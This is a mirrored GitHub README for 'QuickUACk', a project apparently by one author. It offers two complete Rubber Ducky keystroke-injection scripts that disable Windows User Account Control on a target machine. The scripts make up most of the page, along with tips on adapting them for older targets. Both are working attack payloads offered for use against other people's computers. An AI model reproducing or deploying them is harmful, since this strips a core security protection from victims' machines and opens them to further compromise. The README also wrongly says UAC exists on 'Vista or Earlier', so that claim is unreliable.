GithubHelp home page GithubHelp logo

quickuack's Introduction

QuickUACk!

Some of my antiUAC Scripts for Rubbber Ducky

A pair of fast solutions to disable UAC (User Account Control)
it works on all windows version 32 and 64 bits with uac (Vista or Earlier)
and are valid for all languages (Latin, of course).

The scripts were created with the Italian keyboard,
so I do not exclude that in some cases they require minor adjustments.
if the target machine is old, I recommend extending the delay time.


alt text


Ver 1.0 uses a .exe application from the C: \ Windows \ System32 (system protected) folder,
to start the uac on-screen control and switch to the uac panel.
the C: \ Windows \ SysWOW64 folder for the purpose or other protected system folders that contain exe are also fine.
Several applications contained in System32 are good, but be careful because there are some exceptions.
You can consult this list to see the applications that are whitelisted by default
and therefore do not require uac checking to be performed:

https://github.com/JonnyBanana/UAC-System32-Whitelisted-App-List


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

QuickUACk Ver. 1.0

DELAY 2000
CTRL ESC
DELAY 200
REM start C:\Windows\System32\AdapterTroubleshooter.exe
REM work on all windows version 32 and 64 bit
REM no reboot is required for disabling
STRING AdapterTroubleshooter
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

QuickUACk Ver. 2.0

DELAY 2000
CTRL ESC
DELAY 200
REM opens directly the User Account Control Panel
REM work on all windows version 32 and 64 bit with uac (Vista or Earlier)
REM no reboot is required for disabling
STRING UAC
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

quickuack's People

Contributors

jonnybanana avatar

Stargazers

M1n1xM0rK avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.